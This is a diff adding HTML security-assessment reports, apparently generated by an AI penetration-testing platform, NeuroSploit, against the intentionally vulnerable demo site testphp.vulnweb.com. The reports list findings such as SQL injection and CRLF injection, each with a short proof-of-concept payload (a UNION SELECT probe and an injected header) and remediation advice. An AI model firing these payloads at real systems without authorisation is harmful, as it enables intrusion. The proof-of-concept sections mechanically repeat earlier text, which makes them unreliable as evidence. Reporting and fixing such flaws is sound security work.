+   Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-inline&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39;; connect-src &#39;self&#39;; frame-ancestors &#39;none&#39;;
+   ```
+
+2. **Configure Web Server Level**: Implement CSP at the web server level (Apache/Nginx) or application framework level to ensure consistent application across all pages:
+   - **Apache**: `Header always set Content-Security-Policy &quot;default-src &#39;self&#39;&quot;`
+   - **Nginx**: `add_header Content-Security-Policy &quot;default-src &#39;self&#39;&quot; always;`
+   - **PHP**: `header(&quot;Content-Security-Policy: default-src &#39;self&#39;&quot;);`
+
+3. **Implement CSP Reporting**: Use CSP reporting to monitor policy violations and identify potential attacks:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; report-uri /csp-report-endpoint
+   ```
+
+4. **Gradual Implementation**: Start with `Content-Security-Policy-Report-Only` header to test policies without breaking functionality, then transition to enforcement mode.
+
+5. **Regular Policy Review**: Regularly review and update CSP policies to ensure they remain effective while supporting legitimate application functionality. Use tools like CSP Evaluator to validate policy effectiveness.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Cleartext HTTP Transmission</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> cleartext_transmission</span>
+                    <span><strong>CWE:</strong> CWE-319</span>
+                    <span><strong>CVSS:</strong> 5.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> The application transmits sensitive data over unencrypted HTTP connections without providing an HTTPS alternative. During testing, it was confirmed that the web application at http://testphp.vulnweb.com/ exclusively operates over HTTP protocol, with no secure HTTPS endpoint available for users or automated systems to establish encrypted communications.
+
+This vulnerability allows network-positioned attackers to intercept, modify, and replay HTTP traffic between clients and the server. All data transmitted through forms, authentication mechanisms, session tokens, and application responses are sent in cleartext format, making them vulnerable to eavesdropping attacks through packet sniffing, man-in-the-middle attacks, or network infrastructure compromises.
+
+The absence of transport layer security affects all functionality within the application, including potentially sensitive operations such as user authentication, data submission, and session management. This creates a fundamental security weakness that undermines any application-level security controls implemented within the web application.</p>
+                    <p><strong>Impact:</strong> An attacker positioned on the network path between users and the server could intercept all communications, including usernames, passwords, session tokens, personal information, and business data transmitted through the application. This could lead to account takeover, identity theft, unauthorized access to sensitive business information, and complete compromise of user privacy. The cleartext transmission vulnerability enables various attack scenarios including session hijacking, credential harvesting, and data manipulation attacks where attackers could modify requests and responses in transit.
+
+From a compliance perspective, this vulnerability creates significant regulatory risks. Organizations handling payment card data would fail PCI-DSS requirements (specifically Requirement 4.1), which mandates encryption of cardholder data transmission over open networks. GDPR compliance may also be compromised as the regulation requires appropriate technical measures to protect personal data, and cleartext transmission fails to meet reasonable security standards. Additional regulatory frameworks such as HIPAA for healthcare data, SOX for financial reporting, and various industry-specific standards mandate encryption of data in transit, making this vulnerability a critical compliance violation.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement HTTPS with proper TLS configuration**: Deploy a valid SSL/TLS certificate and configure the web server to serve the application exclusively over HTTPS. Use TLS 1.2 or higher with strong cipher suites. Remove or disable HTTP listeners entirely, or configure them to redirect all requests to HTTPS endpoints using 301/302 redirects.
+
+2. **Enforce HTTP Strict Transport Security (HSTS)**: Add the Strict-Transport-Security header to all HTTPS responses to prevent protocol downgrade attacks. Example header: `Strict-Transport-Security: max-age=31536000; includeSubDomains; preload`. Consider submitting the domain to the HSTS preload list for maximum protection.
+
+3. **Configure secure redirects and URL rewriting**: Ensure all HTTP requests are automatically redirected to HTTPS equivalents. Implement server-level redirects (Apache mod_rewrite, Nginx rewrite rules) or application-level redirects. Update all internal links, forms, and references to use HTTPS URLs exclusively.
+
+4. **Implement Content Security Policy (CSP)**: Deploy CSP headers that include the `upgrade-insecure-requests` directive to automatically upgrade HTTP resource requests to HTTPS. Example: `Content-Security-Policy: upgrade-insecure-requests; default-src &#39;self&#39; https:`.
+
+5. **Review and update external dependencies**: Audit all third-party integrations, APIs, and external resources to ensure they support HTTPS. Update any hardcoded HTTP URLs in configuration files, source code, and documentation. Implement proper certificate validation for all outbound HTTPS connections.
+
+6. **Deploy additional security headers**: Implement complementary security headers including `X-Content-Type-Options: nosniff`, `X-Frame-Options: DENY`, and `Referrer-Policy: strict-origin-when-cross-origin` to provide defense-in-depth protection alongside HTTPS enforcement.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>CRLF Injection / HTTP Response Splitting</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> crlf_injection</span>
+                    <span><strong>CWE:</strong> CWE-93</span>
+                    <span><strong>CVSS:</strong> 6.1</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=%250d%250aX-Injected:neurosploit</p>
+                    <p><strong>Description:</strong> A CRLF (Carriage Return Line Feed) injection vulnerability was identified in the &#39;cat&#39; parameter of the listproducts.php endpoint. This vulnerability allows attackers to inject arbitrary HTTP headers into server responses by manipulating line breaks in the HTTP protocol. The vulnerability was confirmed by successfully injecting a custom &#39;X-Injected&#39; header using URL-encoded CRLF characters (%0d%0a).
+
+CRLF injection occurs when user input containing carriage return and line feed characters is reflected in HTTP response headers without proper sanitization. In this case, the application appears to process the &#39;cat&#39; parameter and include it in the response in a way that allows header injection. The payload %0d%0aX-Injected:neurosploit successfully demonstrates the ability to inject arbitrary headers, which could be leveraged for more sophisticated attacks including HTTP response splitting, cache poisoning, or cross-site scripting (XSS) via header manipulation.
+
+The evidence also suggests potential SQL injection vulnerabilities in the same parameter, as SQL error patterns were observed in responses. This indicates that the parameter may be processed by database queries without proper sanitization, creating a compound vulnerability scenario where both CRLF injection and SQL injection may be possible through the same attack vector.</p>
+                    <p><strong>Impact:</strong> The CRLF injection vulnerability could allow attackers to manipulate HTTP responses and potentially compromise user sessions or application integrity. Attackers could inject malicious headers to perform HTTP response splitting attacks, leading to cache poisoning where malicious content is stored in proxy caches and served to other users. This could result in defacement, malware distribution, or credential theft.
+
+The ability to inject arbitrary headers also enables session fixation attacks, where attackers can manipulate session cookies or authentication tokens. In combination with the potential SQL injection vulnerability in the same parameter, attackers could potentially extract sensitive data from the database, modify application data, or gain unauthorized access to user accounts. From a compliance perspective, this vulnerability could result in violations of PCI-DSS requirements (particularly sections 6.5.1 and 6.5.7) if the application processes payment card data, and may constitute a data protection breach under GDPR if personal data is compromised through SQL injection exploitation.</p>
+                    
+                <div class="poc-section">
+                    <h4>Proof of Concept</h4>
+                    <div class="ohvr-section">
+                        <h5>Observation</h5>
+                        <p>A CRLF (Carriage Return Line Feed) injection vulnerability was identified in the &#39;cat&#39; parameter of the listproducts.php endpoint. This vulnerability allows attackers to inject arbitrary HTTP headers into server responses by manipulating line breaks in the HTTP protocol. The vulnerability was confirmed by successfully injecting a custom &#39;X-Injected&#39; header using URL-encoded CRLF characters (%0d%0a).
+
+CRLF injection occurs when user input containing carriage return and line feed characters is reflected in HTTP response headers without proper sanitization. In this case, the application appears to process the &#39;cat&#39; parameter and include it in the response in a way that allows header injection. The payload %0d%0aX-Injected:neurosploit successfully demonstrates the ability to inject arbitrary headers, which could be leveraged for more sophisticated attacks including HTTP response splitting, cache poisoning, or cross-site scripting (XSS) via header manipulation.
+
+The evidence also suggests potential SQL injection vulnerabilities in the same parameter, as SQL error patterns were observed in responses. This indicates that the parameter may be processed by database queries without proper sanitization, creating a compound vulnerability scenario where both CRLF injection and SQL injection may be possible through the same attack vector.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Hypothesis</h5>
+                        <p>The endpoint may be vulnerable to crlf_injection based on observed behavior.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Validation</h5>
+                        <div class="code-block"><pre>%0d%0aX-Injected:neurosploit</pre></div>
+                        
+                        
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Result</h5>
+                        <p>The CRLF injection vulnerability could allow attackers to manipulate HTTP responses and potentially compromise user sessions or application integrity. Attackers could inject malicious headers to perform HTTP response splitting attacks, leading to cache poisoning where malicious content is stored in proxy caches and served to other users. This could result in defacement, malware distribution, or credential theft.
+
+The ability to inject arbitrary headers also enables session fixation attacks, where attackers can manipulate session cookies or authentication tokens. In combination with the potential SQL injection vulnerability in the same parameter, attackers could potentially extract sensitive data from the database, modify application data, or gain unauthorized access to user accounts. From a compliance perspective, this vulnerability could result in violations of PCI-DSS requirements (particularly sections 6.5.1 and 6.5.7) if the application processes payment card data, and may constitute a data protection breach under GDPR if personal data is compromised through SQL injection exploitation.</p>
+                    </div>
+                </div>
+                
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Input Validation and Sanitization**: Implement strict input validation for the &#39;cat&#39; parameter and all user-supplied data. Reject any input containing CRLF characters (\r\n, %0d%0a) or other control characters. Use allowlists to define acceptable characters and patterns for each parameter.
+
+2. **Output Encoding**: Ensure all user input is properly encoded before being included in HTTP headers or responses. Use appropriate encoding functions provided by the web framework, such as `htmlspecialchars()` in PHP or equivalent functions in other languages.
+
+3. **HTTP Header Security**: Never directly concatenate user input into HTTP headers. If dynamic header generation is required, use framework-provided header manipulation functions that automatically handle escaping and validation.
+
+4. **Code Example (PHP)**:
+```php
+// BAD - Vulnerable to CRLF injection
+$category = $_GET[&#39;cat&#39;];
+header(&quot;X-Category: &quot; . $category);
+
+// GOOD - Properly sanitized
+$category = filter_input(INPUT_GET, &#39;cat&#39;, FILTER_SANITIZE_STRING);
+$category = preg_replace(&#39;/[\r\n]/&#39;, &#39;&#39;, $category); // Remove CRLF
+if (ctype_alnum($category)) {
+    header(&quot;X-Category: &quot; . $category);
+}
+```
+
+5. **SQL Injection Prevention**: Given the evidence of SQL errors, implement parameterized queries (prepared statements) for all database interactions. Example:
+```php
+// Use prepared statements
+$stmt = $pdo-&gt;prepare(&quot;SELECT * FROM products WHERE category = ?&quot;);
+$stmt-&gt;execute([$category]);
+```
+
+6. **Security Headers**: Implement security headers such as `X-Frame-Options`, `X-Content-Type-Options`, and `Content-Security-Policy` to provide defense-in-depth protection against header manipulation attacks.
+
+7. **Web Application Firewall (WAF)**: Deploy a WAF to filter malicious requests and provide an additional layer of protection against injection attacks.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #17a2b8;">LOW</span>
+                    <h3>Directory Listing Enabled</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> directory_listing</span>
+                    <span><strong>CWE:</strong> CWE-548</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/images/</p>
+                    <p><strong>Description:</strong> A directory listing vulnerability was identified on the target web application at http://testphp.vulnweb.com/images/. This vulnerability occurs when the web server is configured to display the contents of directories that do not contain an index file (such as index.html, index.php, or default.htm), allowing unauthorized users to browse and enumerate files and subdirectories within the web root.
+
+The vulnerability was discovered by directly accessing the /images/ directory path, which responded with an auto-generated directory listing page instead of returning a 403 Forbidden or 404 Not Found error. This misconfiguration typically stems from improper web server configuration where directory indexes are enabled globally or for specific directories without proper access controls.
+
+In this specific instance, the /images/ directory exposes its entire contents to any remote user without authentication. This allows attackers to enumerate potentially sensitive files, understand the application&#39;s structure, and identify additional attack vectors such as backup files, configuration files, or other resources that should not be publicly accessible.</p>
+                    <p><strong>Impact:</strong> The exposure of directory listings presents several security risks to the organization. Attackers can enumerate sensitive files that may contain configuration details, backup files with source code, database credentials, or other confidential information. This information disclosure can facilitate further attacks by revealing the application&#39;s internal structure, file naming conventions, and potential entry points for more serious vulnerabilities.
+
+From a compliance perspective, this vulnerability may violate data protection regulations such as GDPR Article 32 (Security of processing) if personal data is inadvertently exposed through accessible files. Organizations subject to PCI-DSS compliance may also face violations under Requirement 2.2.4, which mandates the removal of unnecessary functionality that could provide unauthorized access to system components. The business impact includes potential data breaches, intellectual property theft, and reputational damage if sensitive corporate information becomes publicly accessible through directory traversal.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Disable Directory Indexes**: Configure the web server to disable directory browsing. For Apache servers, add &#39;Options -Indexes&#39; to the .htaccess file or virtual host configuration. For Nginx, ensure the &#39;autoindex off;&#39; directive is set in the server configuration.
+
+2. **Implement Default Index Files**: Place default index files (index.html, index.php, or default.htm) in all directories that should not display listings. Even an empty index file will prevent directory enumeration.
+
+3. **Configure Custom Error Pages**: Implement custom 403 Forbidden error pages for directories without index files to provide a consistent user experience while preventing information disclosure.
+
+4. **Web Server Configuration Examples**:
+   - Apache: Add to .htaccess or virtual host: &#39;Options -Indexes -MultiViews&#39;
+   - Nginx: Add to server block: &#39;autoindex off; location ~ /\. { deny all; }&#39;
+   - IIS: Disable directory browsing in the Directory Security settings
+
+5. **Implement Access Controls**: Use web server access controls to restrict access to sensitive directories. Configure authentication requirements for administrative or sensitive file locations.
+
+6. **Regular Security Auditing**: Implement automated scanning tools to regularly check for directory listing vulnerabilities as part of the continuous security monitoring process.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #6c757d;">INFO</span>
+                    <h3>Server Version Disclosure</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> sensitive_data_exposure</span>
+                    <span><strong>CWE:</strong> CWE-200</span>
+                    <span><strong>CVSS:</strong> 3.1</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> A server version disclosure vulnerability was identified on the target application at http://testphp.vulnweb.com/. The web server is exposing detailed version information (nginx/1.19.0) in HTTP response headers, specifically through the &#39;Server&#39; header field. This information disclosure occurs on every HTTP response from the server, making it readily accessible to any client making requests to the application.
+
+The vulnerability was discovered during routine HTTP header analysis, where the server&#39;s response headers were examined for information leakage. The nginx web server is configured to include its specific version number (1.19.0) in the Server header, which provides attackers with precise information about the underlying infrastructure. This level of detail allows potential attackers to research known vulnerabilities specific to this exact version of nginx and craft targeted attacks accordingly.
+
+While this vulnerability does not directly compromise the application&#39;s functionality or data, it significantly reduces the security through obscurity and provides valuable reconnaissance information that can be leveraged in subsequent attack phases. The disclosed version information can be used to identify known CVEs, default configurations, and potential attack vectors specific to nginx 1.19.0.</p>
+                    <p><strong>Impact:</strong> The exposure of specific server version information provides attackers with valuable intelligence for reconnaissance and targeted attacks. With knowledge that the server is running nginx version 1.19.0, attackers can research and identify known vulnerabilities, security advisories, and exploit code specific to this version. This information significantly reduces the effort required for attackers to develop effective attack strategies and increases the likelihood of successful exploitation of any underlying vulnerabilities.
+
+From a compliance perspective, many security frameworks and standards (including PCI-DSS requirement 2.2.5 and NIST guidelines) recommend removing or obfuscating version information to reduce attack surface. The disclosure of version information may be flagged during compliance audits and could contribute to failing security assessments. While the immediate risk is informational, this vulnerability often appears alongside other more critical security issues and represents a failure in security hardening practices that could indicate broader security configuration weaknesses across the infrastructure.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Configure nginx to suppress version information**: Modify the nginx configuration file (/etc/nginx/nginx.conf) to include &#39;server_tokens off;&#39; directive in the http block. This prevents nginx from displaying version information in the Server header and error pages.
+
+2. **Implement custom Server header**: Configure a generic Server header value that doesn&#39;t reveal specific software or version information. Use directives like &#39;more_set_headers &quot;Server: WebServer&quot;;&#39; with the nginx headers-more module, or &#39;add_header Server &quot;WebServer&quot; always;&#39; to override the default header.
+
+3. **Use a reverse proxy or load balancer**: Deploy a reverse proxy (such as CloudFlare, AWS ALB, or dedicated WAF) in front of the nginx server to strip or modify response headers before they reach clients. Configure the proxy to remove or replace the Server header with a generic value.
+
+4. **Regular security hardening**: Implement a comprehensive server hardening checklist that includes header security, disable unnecessary modules, remove default pages, and follow nginx security best practices. Regularly update nginx to the latest stable version and monitor security advisories.
+
+5. **Security header policy**: Implement a comprehensive security header policy that includes not only removing version disclosure but also adding protective headers like X-Content-Type-Options, X-Frame-Options, and Content-Security-Policy to enhance overall security posture.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #6c757d;">INFO</span>
+                    <h3>Technology Version Disclosure</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> sensitive_data_exposure</span>
+                    <span><strong>CWE:</strong> CWE-200</span>
+                    <span><strong>CVSS:</strong> 3.7</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> A technology version disclosure vulnerability was identified on the application hosted at http://testphp.vulnweb.com/. The server is configured to expose detailed version information through the X-Powered-By HTTP response header, revealing that the application is running PHP version 5.6.40-38+ubuntu20.04.1+deb.sury.org+1. This information disclosure occurs on every HTTP response from the server, providing attackers with valuable intelligence about the underlying technology stack without requiring authentication or special privileges.
+
+The vulnerability manifests through the automatic inclusion of the X-Powered-By header in HTTP responses, which is a default behavior in many web server configurations. This header explicitly reveals not only the programming language (PHP) and its exact version (5.6.40), but also detailed information about the Ubuntu distribution version (20.04.1) and the package repository source (deb.sury.org). Such granular version information significantly aids attackers in reconnaissance activities and targeted exploit development.
+
+The disclosed PHP version (5.6.40) is particularly concerning as PHP 5.6 reached end-of-life in December 2018 and no longer receives security updates. This makes the application potentially vulnerable to numerous known security flaws that have been discovered since the version&#39;s discontinuation, creating a compound security risk beyond the information disclosure itself.</p>
+                    <p><strong>Impact:</strong> The exposure of detailed technology version information provides attackers with a roadmap for targeted exploitation attempts. With knowledge of the specific PHP version (5.6.40), attackers can research and deploy known exploits that affect this outdated version, significantly reducing the time and effort required for successful attacks. The end-of-life status of PHP 5.6 means there are likely multiple unpatched vulnerabilities that can be exploited.
+
+From a business perspective, this vulnerability increases the attack surface and makes the application a more attractive target for automated scanning tools and opportunistic attackers. The information disclosure could facilitate more sophisticated attacks including remote code execution, data breaches, or complete system compromise if combined with other vulnerabilities. Organizations subject to compliance frameworks such as PCI-DSS, GDPR, or HIPAA may face regulatory scrutiny for running outdated, unsupported software versions that could compromise sensitive data protection requirements.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Disable X-Powered-By Header**: Configure the web server to suppress the X-Powered-By header. For Apache servers with PHP, add &#39;expose_php = Off&#39; to the php.ini configuration file. For Nginx, ensure the &#39;server_tokens&#39; directive is set to &#39;off&#39;. For IIS servers, remove or modify the X-Powered-By header through the web.config file using the &lt;httpProtocol&gt; section.
+
+2. **Upgrade PHP Version**: Immediately upgrade from PHP 5.6.40 to a supported version such as PHP 8.1 or 8.2. PHP 5.6 reached end-of-life in December 2018 and contains numerous unpatched security vulnerabilities. Plan for regular updates following the PHP release cycle to maintain security posture.
+
+3. **Implement Security Headers**: Configure security-focused HTTP headers including &#39;Server&#39; header suppression, and implement a comprehensive Content Security Policy (CSP). Use tools like securityheaders.com to validate your header configuration.
+
+4. **Web Application Firewall (WAF)**: Deploy a WAF solution that can strip or modify response headers before they reach clients. Configure rules to remove technology-revealing headers while maintaining application functionality.
+
+5. **Regular Security Audits**: Implement automated security scanning to detect information disclosure vulnerabilities and ensure configuration changes persist through deployments and updates.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+        </div>
+
+        <div class="footer">
+            <p>Generated by NeuroSploit v3 - AI-Powered Penetration Testing Platform</p>
+        </div>
+    </div>
+</body>
+</html>
\ No newline at end of file
diff --git a/data/reports/report_20260209_001855/report_20260209_001855.html b/data/reports/report_20260209_001855/report_20260209_001855.html
new file mode 100644
index 0000000..dba915e
--- /dev/null
+++ b/data/reports/report_20260209_001855/report_20260209_001855.html
@@ -0,0 +1,1365 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Security Assessment Report - AI Agent: auto_pentest - http://testphp.vulnweb.com/</title>
+    <style>
+        :root {
+            --bg-primary: #1a1a2e;
+            --bg-secondary: #16213e;
+            --bg-card: #0f3460;
+            --text-primary: #eee;
+            --text-secondary: #aaa;
+            --accent: #e94560;
+            --border: #333;
+        }
+        * { box-sizing: border-box; margin: 0; padding: 0; }
+        body {
+            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, sans-serif;
+            background: var(--bg-primary);
+            color: var(--text-primary);
+            line-height: 1.6;
+        }
+        .container { max-width: 1200px; margin: 0 auto; padding: 20px; }
+        .header {
+            background: linear-gradient(135deg, var(--bg-secondary), var(--bg-card));
+            padding: 40px;
+            border-radius: 10px;
+            margin-bottom: 30px;
+            text-align: center;
+        }
+        .header h1 { color: var(--accent); margin-bottom: 10px; }
+        .header p { color: var(--text-secondary); }
+        .stats-grid {
+            display: grid;
+            grid-template-columns: repeat(auto-fit, minmax(150px, 1fr));
+            gap: 20px;
+            margin-bottom: 30px;
+        }
+        .stat-card {
+            background: var(--bg-card);
+            padding: 20px;
+            border-radius: 10px;
+            text-align: center;
+        }
+        .stat-card .number { font-size: 2em; font-weight: bold; }
+        .stat-card .label { color: var(--text-secondary); font-size: 0.9em; }
+        .section { background: var(--bg-secondary); padding: 30px; border-radius: 10px; margin-bottom: 30px; }
+        .section h2 { color: var(--accent); margin-bottom: 20px; border-bottom: 2px solid var(--border); padding-bottom: 10px; }
+        .vuln-card {
+            background: var(--bg-card);
+            border-radius: 10px;
+            margin-bottom: 20px;
+            overflow: hidden;
+        }
+        .vuln-header {
+            padding: 20px;
+            display: flex;
+            align-items: center;
+            gap: 15px;
+            border-bottom: 1px solid var(--border);
+        }
+        .vuln-header h3 { flex: 1; }
+        .severity-badge {
+            padding: 5px 15px;
+            border-radius: 20px;
+            color: white;
+            font-weight: bold;
+            font-size: 0.8em;
+        }
+        .vuln-meta {
+            padding: 10px 20px;
+            background: rgba(0,0,0,0.2);
+            display: flex;
+            gap: 20px;
+            flex-wrap: wrap;
+            font-size: 0.9em;
+        }
+        .vuln-body { padding: 20px; }
+        .vuln-body p { margin-bottom: 15px; }
+        .poc-section, .remediation-section {
+            margin-top: 20px;
+            padding-top: 20px;
+            border-top: 1px solid var(--border);
+        }
+        .poc-section h4, .remediation-section h4 { color: var(--accent); margin-bottom: 10px; }
+        .code-block {
+            background: #0a0a15;
+            border-radius: 5px;
+            padding: 15px;
+            overflow-x: auto;
+            margin-top: 10px;
+        }
+        .code-block pre {
+            font-family: 'Monaco', 'Menlo', monospace;
+            font-size: 0.85em;
+            white-space: pre-wrap;
+            word-wrap: break-word;
+        }
+        .executive-summary { white-space: pre-wrap; }
+        .ohvr-section {
+            margin: 1rem 0;
+            padding: 1rem;
+            background: rgba(0,0,0,0.2);
+            border-radius: 8px;
+        }
+        .ohvr-section h5 {
+            color: var(--accent);
+            margin-bottom: 0.5rem;
+            text-transform: uppercase;
+            font-size: 0.8rem;
+            letter-spacing: 1px;
+        }
+        .screenshot-grid {
+            display: grid;
+            grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
+            gap: 1rem;
+            margin: 1rem 0;
+        }
+        .screenshot-card {
+            border: 1px solid var(--border);
+            border-radius: 8px;
+            overflow: hidden;
+        }
+        .screenshot-card img {
+            width: 100%;
+            height: auto;
+            display: block;
+        }
+        .screenshot-caption {
+            padding: 0.5rem;
+            font-size: 0.8rem;
+            color: var(--text-secondary);
+            text-align: center;
+        }
+        .severity-chart {
+            display: flex;
+            height: 30px;
+            border-radius: 5px;
+            overflow: hidden;
+            margin-top: 20px;
+        }
+        .severity-bar { display: flex; align-items: center; justify-content: center; color: white; font-size: 0.8em; font-weight: bold; }
+        .footer { text-align: center; padding: 20px; color: var(--text-secondary); font-size: 0.9em; }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <div class="header">
+            <h1>NeuroSploit Security Report</h1>
+            <p>Security Assessment Report - AI Agent: auto_pentest - http://testphp.vulnweb.com/</p>
+            <p>Generated: 2026-02-09 00:18:55</p>
+        </div>
+
+        <div class="stats-grid">
+            <div class="stat-card">
+                <div class="number" style="color: #dc3545">1</div>
+                <div class="label">Critical</div>
+            </div>
+            <div class="stat-card">
+                <div class="number" style="color: #fd7e14">3</div>
+                <div class="label">High</div>
+            </div>
+            <div class="stat-card">
+                <div class="number" style="color: #ffc107">13</div>
+                <div class="label">Medium</div>
+            </div>
+            <div class="stat-card">
+                <div class="number" style="color: #17a2b8">1</div>
+                <div class="label">Low</div>
+            </div>
+            <div class="stat-card">
+                <div class="number">20</div>
+                <div class="label">Total</div>
+            </div>
+        </div>
+
+        <div class="section">
+            <h2>Executive Summary</h2>
+            <p class="executive-summary">A security assessment was conducted on the target application.
+The assessment identified 20 vulnerabilities across the tested endpoints.
+
+Risk Summary:
+- Critical: 1
+- High: 3
+- Medium: 13
+- Low: 1
+
+Overall Risk Level: Critical
+
+Immediate attention is required to address critical and high severity findings.
+</p>
+        </div>
+
+        <div class="section">
+            <h2>Vulnerability Findings</h2>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #dc3545;">CRITICAL</span>
+                    <h3>Union-based SQL Injection</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> sqli_union</span>
+                    <span><strong>CWE:</strong> CWE-89</span>
+                    <span><strong>CVSS:</strong> 9.8</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=&#39;+UNION+SELECT+NULL--</p>
+                    <p><strong>Description:</strong> A Union-based SQL injection vulnerability was identified in the listproducts.php endpoint of the target application. The vulnerability exists in the &#39;cat&#39; parameter, which is directly incorporated into SQL queries without proper sanitization or parameterization. During testing, the payload &#39; UNION SELECT NULL-- was successfully injected, triggering distinct SQL error messages that confirmed the presence of the vulnerability.
+
+Union-based SQL injection attacks exploit improperly sanitized user input to manipulate SQL queries by injecting UNION statements. This technique allows attackers to combine results from the original query with results from attacker-controlled queries, enabling data extraction from arbitrary database tables. The observed error patterns indicate that the application is directly concatenating user input into SQL statements, creating a classic injection point.
+
+In this specific context, the cat parameter appears to be used for filtering product categories, likely through a WHERE clause in the underlying SQL query. The successful injection of the UNION SELECT payload demonstrates that an attacker can break out of the original query context and execute arbitrary SQL commands with the same privileges as the application&#39;s database user.</p>
+                    <p><strong>Impact:</strong> This SQL injection vulnerability poses a critical security risk to the organization. An attacker could exploit this vulnerability to extract sensitive data from the entire database, including customer information, user credentials, financial records, and proprietary business data. The attacker could potentially escalate privileges, modify or delete database contents, and in some cases, execute operating system commands on the database server.
+
+The business impact could be severe, including data breaches leading to regulatory fines under GDPR, PCI-DSS violations if payment card data is involved, loss of customer trust, competitive disadvantage from stolen intellectual property, and potential legal liability. Given that this is a public-facing web application, the vulnerability could be exploited by remote attackers without authentication, significantly increasing the risk exposure. The ability to perform UNION-based attacks suggests that sensitive data could be systematically extracted through automated tools, making this a high-priority security concern requiring immediate remediation.</p>
+                    
+                <div class="poc-section">
+                    <h4>Proof of Concept</h4>
+                    <div class="ohvr-section">
+                        <h5>Observation</h5>
+                        <p>A Union-based SQL injection vulnerability was identified in the listproducts.php endpoint of the target application. The vulnerability exists in the &#39;cat&#39; parameter, which is directly incorporated into SQL queries without proper sanitization or parameterization. During testing, the payload &#39; UNION SELECT NULL-- was successfully injected, triggering distinct SQL error messages that confirmed the presence of the vulnerability.
+
+Union-based SQL injection attacks exploit improperly sanitized user input to manipulate SQL queries by injecting UNION statements. This technique allows attackers to combine results from the original query with results from attacker-controlled queries, enabling data extraction from arbitrary database tables. The observed error patterns indicate that the application is directly concatenating user input into SQL statements, creating a classic injection point.
+
+In this specific context, the cat parameter appears to be used for filtering product categories, likely through a WHERE clause in the underlying SQL query. The successful injection of the UNION SELECT payload demonstrates that an attacker can break out of the original query context and execute arbitrary SQL commands with the same privileges as the application&#39;s database user.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Hypothesis</h5>
+                        <p>The endpoint may be vulnerable to sqli_union based on observed behavior.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Validation</h5>
+                        <div class="code-block"><pre>&#39; UNION SELECT NULL--</pre></div>
+                        
+                        
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Result</h5>
+                        <p>This SQL injection vulnerability poses a critical security risk to the organization. An attacker could exploit this vulnerability to extract sensitive data from the entire database, including customer information, user credentials, financial records, and proprietary business data. The attacker could potentially escalate privileges, modify or delete database contents, and in some cases, execute operating system commands on the database server.
+
+The business impact could be severe, including data breaches leading to regulatory fines under GDPR, PCI-DSS violations if payment card data is involved, loss of customer trust, competitive disadvantage from stolen intellectual property, and potential legal liability. Given that this is a public-facing web application, the vulnerability could be exploited by remote attackers without authentication, significantly increasing the risk exposure. The ability to perform UNION-based attacks suggests that sensitive data could be systematically extracted through automated tools, making this a high-priority security concern requiring immediate remediation.</p>
+                    </div>
+                </div>
+                
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
